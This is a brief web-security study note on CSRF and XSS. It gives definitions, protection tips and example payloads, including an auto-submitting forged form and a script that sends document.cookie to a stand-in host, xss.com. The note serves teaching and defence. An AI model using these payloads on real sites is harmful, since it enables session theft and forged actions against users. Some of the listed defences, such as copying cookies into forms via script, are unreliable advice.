Cross-Site Request Forgeries (CSRF)

Definition: http://en.wikipedia.org/wiki/Cross-site_request_forgery

Example:

<img src=”http://csrf.com/logout?confirm=true”>

<body onload=”$(‘form’).submit()”>
<form action=”http://csrf.com/” method=”post”>
<input name=”confirm” value=”true” />
</form>
</body>

Protection:
– Check the referrer
– Insert a token to the form, store the token and token_time in session
– Insert the cookies to the form via js (remote XmlHttpRequest calls cannot read cookies)

Cross Site Scripting (XSS)

Definition: http://en.wikipedia.org/wiki/Cross-site_scripting

XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.

Example:

<?php echo $_POST[‘name’]; ?>

Examples of XSS exploits:

<script>alert('xss')</script>

<script>new Image().src=’http://xss.com/xss.php?cookies=’+encodeURI(document.cookie)</script>

<script src=”http://xss.com/xss.js”></script>

Protection:

– Validate the input

– Escape the input / output

<?php echo htmlentities($_POST[‘name’], ENT_QUOTES, ‘UTF-8’);?>

– Only allow the same IP to access the cookie